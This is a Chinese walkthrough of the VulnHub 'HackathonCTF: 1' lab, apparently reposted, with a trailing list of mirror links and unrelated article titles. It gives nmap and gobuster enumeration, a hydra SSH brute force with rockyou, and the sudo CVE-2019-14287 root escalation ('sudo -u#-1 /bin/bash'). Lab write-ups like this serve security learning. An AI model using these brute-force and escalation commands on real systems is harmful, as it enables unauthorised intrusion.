当前位置: 首页 > news >正文

HackathonCTF: 1

HackathonCTF: 1

来自 <https://www.vulnhub.com/entry/hackathonctf-1,591/>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.150

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.150

4,尝试匿名访问ftp服务器

ftp 192.168.23.150

再尝试访问80端口的http服务

应该是因为首页文件被禁止访问,扫描其子目录试试

gobuster dir -u http://192.168.23.150/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403,400

http://192.168.23.150/robots.txt

robots.txt中得到提示

暴力破解7223端口ssh服务的账户密码

5,需要一步步找到账户密码,首先得到了用户名为test

http://192.168.23.150/sudo.html

view-source:http://192.168.23.150/ftc.html

用python把这些ascii码转换成相应的字母或者符号

s = "#117#115#101#32#114#111#99#107#121#111#117#46#116#120#116"

s1 = s.split('#')

s1.pop(0)  # 移除空字符串(因第一个字符是#)

for i in s1:

    print(chr(int(i)), end="")  # 移除多余的//end=""

6,确定下来使用rockyou.txt,开始爆破

hydra -l test -P /usr/share/wordlists/rockyou.txt ssh://192.168.23.150 -s 7223

成功爆破到该用户账户密码jordan23

7,ssh登录一下

ssh test@192.168.23.150 -p 7223

信息收集一下

然后再尝试提权或者横向移动

ctf用户可以任意使用sudo,那么就需要我变成这个用户以实现提权

8,分析发现sudo这个命令本身的版本过低,也是可以提权操作

sudo -u#-1 id -u

-u#-1 触发漏洞,把身份切换成 UID=0。输出应该是:0,表示已经是 root 用户。

sudo -u#-1 /bin/bash

直接启动一个 bash shell。因为 sudo 把 UID=4294967295 解析成 root (0),最终就是 root 权限的 shell。

漏洞原理(CVE-2019-14287)

  • 在 sudo 配置中,可能有一条规则允许用户以 任意 UID 身份运行命令,比如:
    user ALL=(ALL, !root) ALL
    这里表示:用户可以切换成任何人,但不能切换成 root。
  • 但是 sudo 的 UID 解析存在 bug:
    • 当你指定 -u#-1 时,sudo 会把它当成 UID 4294967295(无符号整数溢出)。
    • 内部转换时,这个值又会被映射为 0(root 的 UID)。
    • 结果:攻击者就能绕过 !root 限制,直接获取 root 身份。


文章转载自:

http://eDppxT9r.ypdmr.cn
http://3jt8bkF0.ypdmr.cn
http://x0pds4VE.ypdmr.cn
http://pgVPAIS3.ypdmr.cn
http://h0tZqvj9.ypdmr.cn
http://YWv6bP0p.ypdmr.cn
http://D8lv29b3.ypdmr.cn
http://kEkbyQdS.ypdmr.cn
http://a4HrTclZ.ypdmr.cn
http://jcSQvx6w.ypdmr.cn
http://sK4iAfsH.ypdmr.cn
http://1ZVyYWFm.ypdmr.cn
http://NsWDknbD.ypdmr.cn
http://OQ7tKy2W.ypdmr.cn
http://4HsiCB3O.ypdmr.cn
http://0FvbzhOZ.ypdmr.cn
http://uHpJQ6EN.ypdmr.cn
http://5nyN681X.ypdmr.cn
http://hEdb0Lq4.ypdmr.cn
http://MZXY7gEw.ypdmr.cn
http://gkVpKWst.ypdmr.cn
http://og0nMyNB.ypdmr.cn
http://YUkKA9Az.ypdmr.cn
http://qsSqLgir.ypdmr.cn
http://ON9iJbhp.ypdmr.cn
http://yp1Nb9y1.ypdmr.cn
http://zOyGqVWO.ypdmr.cn
http://mWpeTlvO.ypdmr.cn
http://VbuJWlnc.ypdmr.cn
http://jkE72KLN.ypdmr.cn
http://www.dtcms.com/a/377838.html

相关文章:

  • redis cluster(去中心化)
  • 量子机器学习入门:三种数据编码方法对比与应用
  • 【Mysql】数据库的内置函数
  • 【Unity基础】枚举AudioType各个枚举项对应的音频文件类型
  • 2025数字化转型时代必备证书有哪些?
  • 认知-学习-时间管理系统模型-md说明文档
  • 如何用Postman做接口自动化测试
  • huggingface模型中各文件详解
  • cJson系列——json数据结构分析
  • Bandicam 班迪录屏 -高清录屏 多语便携版(Windows)
  • OpenLayers数据源集成 -- 章节五:MVT格式驱动的现代地图渲染引擎
  • 文件上传与诉讼资料关联表设计实战
  • 一个简单的langgraph agent系统
  • 日语学习-日语知识点小记-构建基础-JLPT-N3阶段(29):文法運用第9回2+使役+(考え方10)
  • 智慧能源管家:家庭光伏储能微网管理系统
  • 应急响应:某网站被挂非法链接
  • 构建AI智能体:二十九、Text2SQL:告别繁琐SQL!用大模型自助生成数据报表
  • 【Office 2024 LTSC 安装和使用指南】
  • Counting Towers (动态规划)
  • Linux内核崩溃时为什么会打印call trace---猝死前的死亡讯息
  • SQL嵌套查询详解:理论+实战提升查询性能
  • 硬件 (七) ARM 软中断, IMX6ULL 点灯
  • 图解网络基础篇
  • .Net程序员就业现状以及学习路线图(五)
  • Golang Panic Throw Map/Channel 并发笔记
  • 计算机毕设 java 高校党员管理系统 基于 Java+SSM 的高校党建管理平台 Java+MySQL 的党员信息与活动系统
  • 【30】C#实战篇——获取路径下的文件名(不包含路径和扩展名),文件名由连续的数字编号+连续的字母编号组成,并分离出文件名数字部分和英文部分
  • p10k configure执行报错: ~/powerlevel10k/config/p10k-lean.zsh is not readable
  • JVM堆溢出:原因、检测与优化
  • 参数规模代表什么?为什么会影响模型性能和推理速度?